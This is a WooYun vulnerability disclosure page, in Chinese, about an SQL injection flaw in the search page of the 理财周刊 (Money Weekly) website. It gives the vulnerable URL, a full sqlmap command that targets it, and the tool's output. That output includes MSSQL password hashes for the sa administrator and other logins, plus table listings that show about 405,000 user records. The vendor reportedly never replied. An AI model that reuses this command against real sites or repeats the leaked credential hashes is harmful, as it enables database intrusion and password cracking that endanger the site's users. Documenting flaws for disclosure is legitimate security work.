当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153741

漏洞标题:理财周刊某处存在SQL注入漏洞(DBA权限/sa密码泄露/40万用户信息泄露/20万系统信息泄露)

相关厂商:理财周刊

漏洞作者: 路人甲

提交时间:2015-11-26 14:47

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-26: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

理财周刊某处存在SQL注入漏洞(DBA权限/sa密码泄露/40万用户信息泄露/20万系统信息泄露)

详细说明:

地址:http://www.moneyweekly.com.cn/frontpage/MoneyWeekly/search.aspx?title=%E6%9C%9F%E8%B4%A7

python sqlmap.py -u "http://www.moneyweekly.com.cn/frontpage/MoneyWeekly/search.aspx?title=%E6%9C%9F%E8%B4%A7" -p title --technique=BEU --random-agent --batch  --current-user --is-dba --users --passwords --count --search -C pass


Database: moneyweekly
+------------------------------------------------------+---------+
| Table                                                | Entries |
+------------------------------------------------------+---------+
| dbo.UserTab                                          | 404993  |


Database: master
+------------------------------------------------------+---------+
| Table                                                | Entries |
+------------------------------------------------------+---------+
| sys.messages                                         | 98318   |
| sys.sysmessages                                      | 98318   |

漏洞证明:

current user:    'sa'
current user is DBA:    True
database management system users [4]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] sa
[*] spider
database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
    password hash: 0x01001e19b31facff9228135c3695fc43222c64cf624400a16a3f
        header: 0x0100
        salt: 1e19b31f
        mixedcase: acff9228135c3695fc43222c64cf624400a16a3f
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
    password hash: 0x01007989ef05d2dc2a4f507ba453276c13b047d531834db8ecc3
        header: 0x0100
        salt: 7989ef05
        mixedcase: d2dc2a4f507ba453276c13b047d531834db8ecc3
[*] sa [1]:
    password hash: 0x0100962ce911c0ce7d9355f9de71206210c89e2410ac95aaf734
        header: 0x0100
        salt: 962ce911
        mixedcase: c0ce7d9355f9de71206210c89e2410ac95aaf734
Database: ReportServerTempDB
+------------------------------------------------------+---------+
| Table                                                | Entries |
+------------------------------------------------------+---------+
| dbo.DBUpgradeHistory                                 | 27      |
+------------------------------------------------------+---------+
Database: ReportServer
+------------------------------------------------------+---------+
| Table                                                | Entries |
+------------------------------------------------------+---------+
| dbo.DBUpgradeHistory                                 | 31      |
| dbo.ConfigurationInfo                                | 23      |
| dbo.Roles                                            | 8       |
| dbo.PolicyUserRole                                   | 4       |
| dbo.Users                                            | 3       |
| dbo.Keys                                             | 2       |
| dbo.Policies                                         | 2       |
| dbo.SecData                                          | 2       |
| dbo.ServerUpgradeHistory                             | 2       |
| dbo.Catalog                                          | 1       |
| dbo.UpgradeInfo                                      | 1       |
+------------------------------------------------------+---------+
Database: master
+------------------------------------------------------+---------+
| Table                                                | Entries |
+------------------------------------------------------+---------+
| sys.messages                                         | 98318   |
| sys.sysmessages                                      | 98318   |
| sys.dm_os_virtual_address_dump                       | 85108   |
| sys.dm_os_memory_objects                             | 62769   |
| sys.dm_os_buffer_descriptors                         | 28969   |
| sys.dm_os_memory_cache_entries                       | 16258   |
| sys.fulltext_system_stopwords                        | 15829   |
| sys.dm_exec_cached_plans                             | 14663   |
| sys.dm_exec_query_stats                              | 13015   |
| sys.syscolumns                                       | 12581   |
| sys.syscacheobjects                                  | 8807    |
| sys.all_parameters                                   | 7090    |
| sys.system_parameters                                | 7090    |
| sys.trace_subclass_values                            | 5366    |
| sys.all_columns                                      | 5285    |
| sys.system_columns                                   | 4626    |
| sys.trace_event_bindings                             | 4304    |
| sys.dm_os_ring_buffers                               | 4246    |
| sys.syscomments                                      | 2997    |
| sys.dm_xe_object_columns                             | 2674    |
| dbo.spt_values                                       | 2508    |
| sys.all_objects                                      | 2002    |
| sys.sysobjects                                       | 2002    |
| sys.system_objects                                   | 1928    |
| sys.database_permissions                             | 1853    |
| sys.syspermissions                                   | 1852    |
| sys.sysprotects                                      | 1848    |
| sys.all_sql_modules                                  | 1785    |
| sys.system_sql_modules                               | 1783    |
| sys.dm_xe_map_values                                 | 1733    |
| sys.dm_os_performance_counters                       | 1086    |
| sys.sysperfinfo                                      | 1086    |
| sys.system_internals_partition_columns               | 822     |
| sys.columns                                          | 659     |
| sys.dm_xe_objects                                    | 542     |
| sys.dm_os_wait_stats                                 | 490     |
| sys.dm_audit_actions                                 | 454     |
| sys.dm_exec_query_transformation_stats               | 377     |
| sys.event_notification_event_types                   | 365     |
| sys.stats_columns                                    | 356     |
| sys.stats_columns                                    | 356     |
| sys.all_views                                        | 354     |
| sys.system_views                                     | 354     |
| sys.dm_db_index_usage_stats                          | 316     |
| sys.index_columns                                    | 271     |
| sys.sysindexkeys                                     | 271     |
| sys.dm_os_memory_cache_clock_hands                   | 265     |
| sys.trigger_event_types                              | 245     |
| sys.dm_os_memory_clerks                              | 242     |
| sys.sysindexes                                       | 205     |
| sys.trace_events                                     | 180     |
| sys.dm_os_spinlock_stats                             | 175     |
| sys.dm_os_latch_stats                                | 144     |
| sys.allocation_units                                 | 128     |
| sys.system_internals_allocation_units                | 128     |
| sys.dm_db_partition_stats                            | 116     |
| sys.indexes                                          | 116     |
| sys.partitions                                       | 116     |
| sys.system_internals_partitions                      | 116     |
| sys.syscharsets                                      | 114     |
| sys.xml_schema_facets                                | 112     |
| sys.dm_os_memory_cache_counters                      | 105     |
| sys.dm_os_loaded_modules                             | 99      |
| sys.xml_schema_components                            | 99      |
| sys.system_components_surface_area_configuration     | 95      |
| sys.dm_audit_class_type_map                          | 83      |
| sys.xml_schema_types                                 | 82      |
| sys.dm_os_threads                                    | 75      |
| sys.objects                                          | 74      |
| sys.configurations                                   | 68      |
| sys.dm_os_worker_local_storage                       | 68      |
| sys.dm_os_workers                                    | 68      |
| sys.sysconfigures                                    | 68      |
| sys.syscurconfigs                                    | 68      |
| sys.trace_columns                                    | 66      |
| sys.dm_os_memory_pools                               | 58      |
| INFORMATION_SCHEMA.COLUMNS                           | 50      |
| sys.fulltext_document_types                          | 50      |
| sys.dm_db_session_space_usage                        | 49      |
| sys.dm_db_task_space_usage                           | 49      |
| sys.dm_os_memory_cache_hash_tables                   | 49      |
| sys.dm_exec_sessions                                 | 48      |
| sys.fulltext_languages                               | 48      |
| sys.dm_exec_procedure_stats                          | 41      |
| sys.dm_exec_query_optimizer_info                     | 39      |
| sys.dm_os_tasks                                      | 36      |
| sys.sysprocesses                                     | 35      |
| sys.systypes                                         | 34      |
| sys.types                                            | 34      |
| sys.syslanguages                                     | 33      |
| sys.dm_exec_requests                                 | 29      |
| sys.server_permissions                               | 25      |
| sys.dm_os_memory_node_access_stats                   | 24      |
| sys.server_principals                                | 24      |
| sys.dm_db_missing_index_details                      | 23      |
| sys.dm_db_missing_index_group_stats                  | 23      |
| sys.dm_db_missing_index_groups                       | 23      |
| sys.securable_classes                                | 22      |
| sys.dm_exec_connections                              | 21      |
| sys.trace_categories                                 | 21      |
| sys.database_principals                              | 18      |
| sys.sysusers                                         | 18      |
| sys.xml_schema_component_placements                  | 18      |
| sys.dm_tran_locks                                    | 16      |
| sys.sysaltfiles                                      | 16      |
| INFORMATION_SCHEMA.SCHEMATA                          | 15      |
| sys.dm_os_stacks                                     | 15      |
| sys.dm_os_waiting_tasks                              | 15      |
| sys.schemas                                          | 15      |
| sys.syslogins                                        | 15      |
| sys.xml_schema_attributes                            | 15      |
| sys.master_files                                     | 14      |
| sys.service_message_types                            | 14      |
| sys.dm_db_script_level                               | 13      |
| sys.dm_os_schedulers                                 | 13      |
| sys.service_contract_message_usages                  | 11      |
| sys.dm_xe_session_event_actions                      | 10      |
| sys.server_event_session_actions                     | 10      |
| sys.crypt_properties                                 | 8       |
| sys.dm_tran_database_transactions                    | 8       |
| sys.syslockinfo                                      | 8       |
| sys.certificates                                     | 7       |
| sys.database_recovery_status                         | 7       |
| sys.databases                                        | 7       |
| sys.dm_tran_active_transactions                      | 7       |
| sys.sysdatabases                                     | 7       |
| INFORMATION_SCHEMA.TABLES                            | 6       |
| sys.dm_os_memory_brokers                             | 6       |
| sys.service_contracts                                | 6       |
| sys.tables                                           | 6       |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES                  | 5       |
| sys.dm_xe_session_events                             | 5       |
| sys.endpoints                                        | 5       |
| sys.server_event_session_events                      | 5       |
| sys.server_role_members                              | 5       |
| sys.dm_exec_query_resource_semaphores                | 4       |
| sys.dm_os_hosts                                      | 4       |
| sys.dm_xe_packages                                   | 4       |
| sys.internal_tables                                  | 4       |
| sys.sql_logins                                       | 4       |
| dbo.MSreplication_options                            | 3       |
| sys.assembly_types                                   | 3       |
| sys.dm_broker_queue_monitors                         | 3       |
| sys.dm_clr_properties                                | 3       |
| sys.dm_os_memory_nodes                               | 3       |
| sys.dm_os_nodes                                      | 3       |
| sys.dm_xe_session_object_columns                     | 3       |
| sys.identity_columns                                 | 3       |
| sys.login_token                                      | 3       |
| sys.service_queue_usages                             | 3       |
| sys.service_queues                                   | 3       |
| sys.services                                         | 3       |
| sys.type_assembly_usages                             | 3       |
| sys.xml_schema_namespaces                            | 3       |
| INFORMATION_SCHEMA.ROUTINES                          | 2       |
| sys.database_files                                   | 2       |
| sys.database_role_members                            | 2       |
| sys.dm_fts_memory_pools                              | 2       |
| sys.dm_resource_governor_resource_pools              | 2       |
| sys.dm_resource_governor_workload_groups             | 2       |
| sys.key_encryptions                                  | 2       |
| sys.procedures                                       | 2       |
| sys.resource_governor_resource_pools                 | 2       |
| sys.resource_governor_workload_groups                | 2       |
| sys.service_contract_usages                          | 2       |
| sys.sql_modules                                      | 2       |
| sys.sysfiles                                         | 2       |
| sys.sysmembers                                       | 2       |
| sys.tcp_endpoints                                    | 2       |
| dbo.spt_monitor                                      | 1       |
| sys.assemblies                                       | 1       |
| sys.assembly_files                                   | 1       |
| sys.data_spaces                                      | 1       |
| sys.default_constraints                              | 1       |
| sys.dm_db_file_space_usage                           | 1       |
| sys.dm_exec_background_job_queue_stats               | 1       |
| sys.dm_exec_background_job_queue_stats               | 1       |
| sys.dm_exec_trigger_stats                            | 1       |
| sys.dm_fts_fdhosts                                   | 1       |
| sys.dm_os_dispatcher_pools                           | 1       |
| sys.dm_os_dispatchers                                | 1       |
| sys.dm_os_process_memory                             | 1       |
| sys.dm_os_sys_info                                   | 1       |
| sys.dm_os_sys_memory                                 | 1       |
| sys.dm_resource_governor_configuration               | 1       |
| sys.dm_tran_current_transaction                      | 1       |
| sys.dm_xe_session_targets                            | 1       |
| sys.dm_xe_sessions                                   | 1       |
| sys.filegroups                                       | 1       |
| sys.linked_logins                                    | 1       |
| sys.resource_governor_configuration                  | 1       |
| sys.routes                                           | 1       |
| sys.server_event_session_fields                      | 1       |
| sys.server_event_session_targets                     | 1       |
| sys.server_event_sessions                            | 1       |
| sys.servers                                          | 1       |
| sys.symmetric_keys                                   | 1       |
| sys.sysconstraints                                   | 1       |
| sys.sysfilegroups                                    | 1       |
| sys.sysoledbusers                                    | 1       |
| sys.sysservers                                       | 1       |
| sys.traces                                           | 1       |
| sys.user_token                                       | 1       |
| sys.via_endpoints                                    | 1       |
| sys.xml_schema_collections                           | 1       |
| sys.xml_schema_model_groups                          | 1       |
| sys.xml_schema_wildcards                             | 1       |
+------------------------------------------------------+---------+
Database: moneyweekly
+------------------------------------------------------+---------+
| Table                                                | Entries |
+------------------------------------------------------+---------+
| dbo.UserTab                                          | 404993  |
| dbo.lczk_t_biz_newscolumn                            | 160894  |
| dbo.lczk_t_biz_newscolumn                            | 160894  |
| dbo.lczk_t_biz_newss                                 | 50650   |
| dbo.ArticleTab                                       | 12921   |
| dbo.NewsTab                                          | 4471    |
| dbo.T_AdminUserLog                                   | 4220    |
| dbo.UserNo                                           | 3845    |
| dbo.T_Region                                         | 3244    |
| dbo.T_alipay_log                                     | 1748    |
| dbo.T_OrderItems                                     | 1500    |
| dbo.T_Orders                                         | 1500    |
| dbo.ProductsTab                                      | 1297    |
| dbo.T_telcode_history                                | 1251    |
| dbo.EntryTab                                         | 1195    |
| dbo.T_StarUser                                       | 1091    |
| dbo.AnswerTab                                        | 920     |
| dbo.JournalTab                                       | 739     |
| dbo.T_GiftCards_history                              | 570     |
| dbo.T_StarGroupUser                                  | 504     |
| dbo.EntryUserTab                                     | 470     |
| dbo.SubscribeTab                                     | 338     |
| dbo.T_Spider                                         | 301     |
| dbo.lczk_t_sys_columns                               | 279     |
| dbo.T_zsdengji                                       | 269     |
| dbo.QuestionsTab                                     | 230     |
| dbo.T_Pic                                            | 117     |
| dbo.T_Product_log                                    | 112     |
| dbo.T_Product_log                                    | 112     |
| dbo.SystemUserGroupMenuAssociatedTab                 | 106     |
| dbo.T_SendBMBEmailLog                                | 84      |
| dbo.T_AdminMenuChild                                 | 80      |
| dbo.T_AdminMenuChild                                 | 80      |
| dbo.MenuTab                                          | 74      |
| dbo.ModuleTab                                        | 58      |
| dbo.T_AdminUserPermission                            | 55      |
| dbo.T_ZanNews                                        | 46      |
| dbo.T_INNERBBS                                       | 34      |
| dbo.NewsTypeTab                                      | 33      |
| dbo.T_ActivityList                                   | 33      |
| dbo.NewsCommentsTab                                  | 27      |
| dbo.VoteAction                                       | 24      |
| dbo.VoteAction                                       | 24      |
| dbo.ActivityTab                                      | 22      |
| dbo.ActivityUserTab                                  | 22      |
| dbo.T_ADClass                                        | 18      |
| dbo.T_ADClass                                        | 18      |
| dbo.T_OrderLog                                       | 17      |
| dbo.TemporaryInformationTab                          | 17      |
| dbo.T_SysComponent                                   | 16      |
| dbo.T_membernews                                     | 15      |
| dbo.SeoTab                                           | 11      |
| dbo.T_TemplatePage                                   | 11      |
| dbo.ExpertTab                                        | 10      |
| dbo.LinksTab                                         | 7       |
| dbo.SystemUserTab                                    | 7       |
| dbo.ProductsTypeTab                                  | 6       |
| dbo.SystemUserGroupTab                               | 6       |
| dbo.T_Dictionary                                     | 6       |
| dbo.UserGroupTab                                     | 6       |
| dbo.LinksTypeTab                                     | 4       |
| dbo.ReservationTab                                   | 4       |
| dbo.T_FavoriteNews                                   | 4       |
| dbo.BasicDataTab                                     | 3       |
| dbo.T_AdminRole                                      | 3       |
| dbo.T_TradeClass                                     | 2       |
| dbo.sysdiagrams                                      | 1       |
| dbo.T_KeyWord                                        | 1       |
| dbo.T_Sequence                                       | 1       |
+------------------------------------------------------+---------+
Database: msdb
+------------------------------------------------------+---------+
| Table                                                | Entries |
+------------------------------------------------------+---------+
| dbo.MSdbms_datatype_mapping                          | 493     |
| dbo.MSdbms_datatype_mapping                          | 493     |
| dbo.MSdbms_datatype_mapping                          | 493     |
| dbo.sysdatatypemappings                              | 493     |
| dbo.MSdbms_map                                       | 374     |
| dbo.MSdatatype_mappings                              | 260     |
| dbo.sysjobhistory                                    | 86      |
| dbo.syspolicy_facet_events                           | 84      |
| dbo.sysutility_mi_smo_properties_to_collect_internal | 84      |
| dbo.syspolicy_management_facets                      | 83      |
| dbo.sysjobactivity                                   | 27      |
| dbo.sysutility_ucp_policy_target_conditions_internal | 24      |
| dbo.sysutility_ucp_policy_target_conditions_internal | 24      |
| dbo.sysmaintplan_logdetail                           | 23      |
| dbo.sysmaintplan_logdetail                           | 23      |
| dbo.syscategories                                    | 21      |
| dbo.sysutility_ucp_configuration_internal            | 13      |
| dbo.sysutility_ucp_configuration_internal            | 13      |
| dbo.syssubsystems                                    | 12      |
| dbo.sysutility_ucp_policy_check_conditions_internal  | 12      |
| dbo.sysutility_ucp_policy_check_conditions_internal  | 12      |
| dbo.backupfilegroup                                  | 11      |
| dbo.backupfilegroup                                  | 11      |
| dbo.backupmediafamily                                | 11      |
| dbo.backupmediaset                                   | 11      |
| dbo.backupset                                        | 11      |
| dbo.sysschedules_localserver_view                    | 11      |
| dbo.sysschedules_localserver_view                    | 11      |
| dbo.sysssispackages                                  | 11      |
| dbo.syssessions                                      | 8       |
| dbo.sysutility_ucp_supported_object_types_internal   | 8       |
| dbo.sysmail_configuration                            | 7       |
| dbo.syscollector_collection_items_internal           | 6       |
| dbo.syscollector_collection_items_internal           | 6       |
| dbo.syscollector_config_store_internal               | 5       |
| dbo.syscollector_config_store_internal               | 5       |
| dbo.sysmanagement_shared_server_groups_internal      | 5       |
| dbo.sysmanagement_shared_server_groups_internal      | 5       |
| dbo.sysutility_mi_smo_objects_to_collect_internal    | 5       |
| dbo.syscollector_collection_sets_internal            | 4       |
| dbo.syscollector_collection_sets_internal            | 4       |
| dbo.syscollector_collector_types_internal            | 4       |
| dbo.syscollector_collector_types_internal            | 4       |
| dbo.sysjobs_view                                     | 4       |
| dbo.sysjobs_view                                     | 4       |
| dbo.sysjobschedules                                  | 4       |
| dbo.sysjobservers                                    | 4       |
| dbo.syspolicy_configuration_internal                 | 4       |
| dbo.syspolicy_configuration_internal                 | 4       |
| dbo.sysssispackagefolders                            | 4       |
| dbo.sysdtscategories                                 | 3       |
| dbo.sysmaintplan_plans                               | 3       |
| dbo.sysmaintplan_subplans                            | 3       |
| dbo.sysutility_ucp_policy_configuration              | 2       |
| dbo.sysdbmaintplans                                  | 1       |
| dbo.sysmail_servertype                               | 1       |
| dbo.sysoriginatingservers_view                       | 1       |
| dbo.sysoriginatingservers_view                       | 1       |
| dbo.systargetservers_view                            | 1       |
| dbo.systargetservers_view                            | 1       |
| dbo.sysutility_ucp_processing_state_internal         | 1       |
| dbo.sysutility_ucp_utility_space_utilization         | 1       |
+------------------------------------------------------+---------+

修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝